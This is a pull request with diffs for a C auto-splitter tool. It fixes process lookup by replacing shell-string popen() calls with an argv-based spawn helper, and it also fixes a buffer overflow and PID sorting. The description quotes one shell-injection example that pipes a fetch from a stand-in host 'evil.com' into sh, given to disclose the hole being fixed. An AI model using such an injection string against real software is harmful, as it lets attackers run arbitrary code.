### PR TITLE
fix(lasr): Fix a handful of issues related to process resolution

### DIFF
--- a/src/lasr/functions/process.c
+++ b/src/lasr/functions/process.c
@@ -90,7 +90,7 @@ int find_process_id(lua_State* L)
     if (strcmp(sort, "first") == 0)
         stock_process_id((const char*[]) { "pgrep", process.name, NULL });
     else
-        stock_process_id((const char*[]) { "sh", "-c", "pgrep \"$1\" | sort --reverse", "sh", process.name, NULL });
+        stock_process_id((const char*[]) { "sh", "-c", "pgrep \"$1\" | sort --reverse --numeric-sort", "sh", process.name, NULL });
 
     return 0;
 }
@@ -124,7 +124,7 @@ int find_cmdline_id(lua_State* L)
     if (strcmp(sort, "first") == 0)
         stock_process_id((const char*[]) { "pgrep", "--full", process.name, NULL });
     else
-        stock_process_id((const char*[]) { "sh", "-c", "pgrep --full \"$1\" | sort --reverse", "sh", process.name, NULL });
+        stock_process_id((const char*[]) { "sh", "-c", "pgrep --full \"$1\" | sort --reverse --numeric-sort", "sh", process.name, NULL });
 
     return 0;
 }

--- a/src/lasr/functions/process.c
+++ b/src/lasr/functions/process.c
@@ -16,12 +16,16 @@ extern atomic_bool auto_splitter_enabled; /*!< Defines if the auto splitter is e
  * @param command The command to execute.
  * @param output Pointer to a string that will contain the command output.
  */
-void execute_command(const char* command, char* output)
+void execute_command(const char* const argv[], char* output)
 {
     char buffer[4096];
-    FILE* pipe = popen(command, "r");
+    pid_t pid;
+    FILE* pipe = pvopen(argv, "r", &pid);
     if (!pipe) {
-        fprintf(stderr, "Error executing command: %s\n", command);
+        fprintf(stderr, "Error executing command: { ");
+        while (*argv != NULL)
+            fprintf(stderr, "'%s', ", *argv++);
+        fprintf(stderr, "}");
         exit(1);
     }
 
@@ -29,16 +33,16 @@ void execute_command(const char* command, char* output)
         strcat(output, buffer);
     }
 
-    pclose(pipe);
+    pvclose(pipe, pid);
 }
 
-void stock_process_id(const char* pid_command)
+void stock_process_id(const char* const argv[])
 {
     char pid_output[PATH_MAX + 100];
     pid_output[0] = '\0';
 
     while (atomic_load(&auto_splitter_enabled)) {
-        execute_command(pid_command, pid_output);
+        execute_command(argv, pid_output);
         process.pid = strtoul(pid_output, NULL, 10);
         if (process.pid) {
             size_t newlinePos = strcspn(pid_output, "\n");
@@ -71,7 +75,6 @@ int find_process_id(lua_State* L)
 
     process.name = lua_tostring(L, 1);
     const char* sort = lua_tostring(L, 2);
-    char sortCmd[16] = "";
 
     if (!sort) {
         sort = "first";
@@ -82,17 +85,10 @@ int find_process_id(lua_State* L)
         }
     }
 
-    if (strcmp(sort, "first") == 0) {
-        sortCmd[0] = '\0'; // No sorting
-    }
-    if (strcmp(sort, "last") == 0) {
-        strcpy(sortCmd, " | sort -r"); // Reverse the sorting to get latest PID
-    }
-
-    char command[256];
-    snprintf(command, sizeof(command), "pgrep \"%.*s\"%s", (int)strnlen(process.name, sizeof(command) - strlen(sortCmd) - 1), process.name, sortCmd);
-
-    stock_process_id(command);
+    if (strcmp(sort, "first") == 0)
+        stock_process_id((const char*[]) { "pgrep", process.name, NULL });
+    else
+        stock_process_id((const char*[]) { "sh", "-c", "pgrep \"$1\" | sort --reverse", "sh", process.name, NULL });
 
     return 0;
 }
@@ -113,7 +109,6 @@ int find_cmdline_id(lua_State* L)
 
     process.name = lua_tostring(L, 1);
     const char* sort = lua_tostring(L, 2);
-    char sortCmd[16] = "";
 
     if (!sort) {
         sort = "first";
@@ -124,17 +119,10 @@ int find_cmdline_id(lua_State* L)
         }
     }
 
-    if (strcmp(sort, "first") == 0) {
-        sortCmd[0] = '\0'; // No sorting
-    }
-    if (strcmp(sort, "last") == 0) {
-        strcpy(sortCmd, " | sort -r"); // Reverse the sorting to get latest PID
-    }
-
-    char command[256];
-    snprintf(command, sizeof(command), "pgrep -f \"%.*s\"%s", (int)strnlen(process.name, sizeof(command) - strlen(sortCmd) - 1), process.name, sortCmd);
-
-    stock_process_id(command);
+    if (strcmp(sort, "first") == 0)
+        stock_process_id((const char*[]) { "pgrep", "--full", process.name, NULL });
+    else
+        stock_process_id((const char*[]) { "sh", "-c", "pgrep --full \"$1\" | sort --reverse", "sh", process.name, NULL });
 
     return 0;
 }

--- a/src/lasr/functions/process.c
+++ b/src/lasr/functions/process.c
@@ -124,7 +124,8 @@ int find_cmdline_id(lua_State* L)
     if (strcmp(sort, "first") == 0)
         stock_process_id((const char*[]) { "pgrep", "--full", process.name, NULL });
     else
-        stock_process_id((const char*[]) { "sh", "-c", "pgrep --full \"$1\" | sort --reverse --numeric-sort", "sh", process.name, NULL });
+        // We pass --ignore-ancestors to stop pgrep from detecting itself
+        stock_process_id((const char*[]) { "sh", "-c", "pgrep --ignore-ancestors --full \"$1\" | sort --reverse --numeric-sort", "sh", process.name, NULL });
 
     return 0;
 }

--- a/src/lasr/functions/process.c
+++ b/src/lasr/functions/process.c
@@ -15,10 +15,10 @@ extern atomic_bool auto_splitter_enabled; /*!< Defines if the auto splitter is e
  *
  * @param command The command to execute.
  * @param output Pointer to a string that will contain the command output.
+ * @param size The size of `output` including the terminating null byte.
  */
-void execute_command(const char* const argv[], char* output)
+void execute_command(const char* const argv[], char* output, size_t size)
 {
-    char buffer[4096];
     pid_t pid;
     FILE* pipe = pvopen(argv, "r", &pid);
     if (!pipe) {
@@ -29,9 +29,11 @@ void execute_command(const char* const argv[], char* output)
         exit(1);
     }
 
-    while (fgets(buffer, 128, pipe) != NULL) {
-        strcat(output, buffer);
-    }
+    size_t read = fread(output, 1, size - 1, pipe);
+    output[read] = 0;
+    char* newline = strrchr(output, '\n');
+    if (newline != NULL)
+        *(newline + 1) = 0;
 
     pvclose(pipe, pid);
 }
@@ -42,7 +44,7 @@ void stock_process_id(const char* const argv[])
     pid_output[0] = '\0';
 
     while (atomic_load(&auto_splitter_enabled)) {
-        execute_command(argv, pid_output);
+        execute_command(argv, pid_output, sizeof(pid_output));
         process.pid = strtoul(pid_output, NULL, 10);
         if (process.pid) {
             size_t newlinePos = strcspn(pid_output, "\n");

--- a/src/lasr/utils.c
+++ b/src/lasr/utils.c
@@ -4,8 +4,14 @@
 #include "./maps/maps.h"
 
 #include <glib.h>
+
+#include <assert.h>
+#include <spawn.h>
 #include <stdatomic.h>
 #include <stdio.h>
+#include <sys/wait.h>
+
+extern char** environ;
 
 game_process process;
 
@@ -105,4 +111,68 @@ const char* value_to_c_string(lua_State* L, int index)
         default:
             return "??";
     }
+}
+
+/**
+ * @brief Like `popen()`, but you can specify the argv.
+ *
+ * Searches for `argv[0]` in the current `PATH` and executes it with an argument list of `argv`.
+ *
+ * @param argv The NULL-terminated argument list for the program.
+ * @param mode `"r"` or `"w"` depending on whether you want to read from or write to the child process's standard IO.
+ * @param pid[out] The spawned process's ID.
+ * @copyright Adapted from the musl implementation of `popen()`.
+ * @return A `FILE` stream linked to the process's standard input or output, or NULL on error.
+ */
+FILE* pvopen(const char* const argv[], const char* mode, pid_t* pid)
+{
+    int pipefd[2];
+    posix_spawn_file_actions_t actions = { 0 };
+
+    assert(*mode == 'r' || *mode == 'w');
+    assert(!strchr(mode, 'e') && "FD_CLOEXEC mode not supported");
+    int op = *mode == 'w';
+
+    if (pipe(pipefd) == -1)
+        return NULL;
+    FILE* fp = fdopen(pipefd[op], mode);
+    if (!fp) {
+        close(pipefd[0]);
+        close(pipefd[1]);
+        return NULL;
+    }
+    int err = 0;
+    int backup_pid;
+    if ((err = posix_spawn_file_actions_init(&actions)) != 0)
+        goto fail_init;
+    if ((err = posix_spawn_file_actions_adddup2(&actions, pipefd[1 - op], 1 - op)) != 0)
+        goto fail;
+    if ((err = posix_spawnp(pid ? pid : &backup_pid, argv[0], &actions, NULL, (char* const*)argv, environ)) != 0)
+        goto fail;
+    posix_spawn_file_actions_destroy(&actions);
+    close(pipefd[1 - op]);
+
+    return fp;
+
+fail:
+    posix_spawn_file_actions_destroy(&actions);
+fail_init:
+    fclose(fp);
+    close(pipefd[1 - op]);
+    return NULL;
+}
+
+/**
+ * @brief Close the IO stream produced by pvopen().
+ * @param fp The IO stream returned by pvopen().
+ * @param pid The process id returned by pvopen().
+ * @copyright Adapted from the musl implementation of `pclose()`.
+ * @return The exit status of the command.
+ */
+int pvclose(FILE* fp, pid_t pid)
+{
+    int status;
+    fclose(fp);
+    waitpid(pid, &status, 0);
+    return status;
 }

--- a/src/lasr/utils.h
+++ b/src/lasr/utils.h
@@ -5,6 +5,7 @@
 
 #include <stdbool.h>
 #include <stdint.h>
+#include <stdio.h>
 #include <sys/time.h>
 #include <unistd.h>
 
@@ -38,3 +39,5 @@ bool restart_auto_splitter(void);
 uintptr_t find_base_address(const char* module);
 bool handle_memory_error(uint32_t err);
 const char* value_to_c_string(lua_State* L, int index);
+FILE* pvopen(const char* const argv[], const char* mode, pid_t* pid);
+int pvclose(FILE* fp, pid_t pid);


### PR DESCRIPTION
Hi all! I noticed a couple of issues with `process()` and `cmdline()`:
1. If too many results are found a buffer can overflow causing a segfault
1. When passing `"last"`, the functions don't correctly find the newest process as they sort PIDs lexicographically rather than numerically
1. `pgrep -f` will detect the `sh` process that spawned it when it is being piped from, so `cmdline(..., "last")` will attach to the shell created by `popen()` rather than the game
1. Malicious scripts can execute arbitrary shell commands as follows: `process('"; curl evil.com | sh - #')`

I left more detailed notes in my commit messages. I assume the last one is a problem as `auto-splitter.c` takes some pains to sandbox potentially dangerous Lua functions. This PR takes care of these as best I can, though I just noticed that #382 intends to fully tear out `pgrep`, so that would take care of all except perhaps no. 3.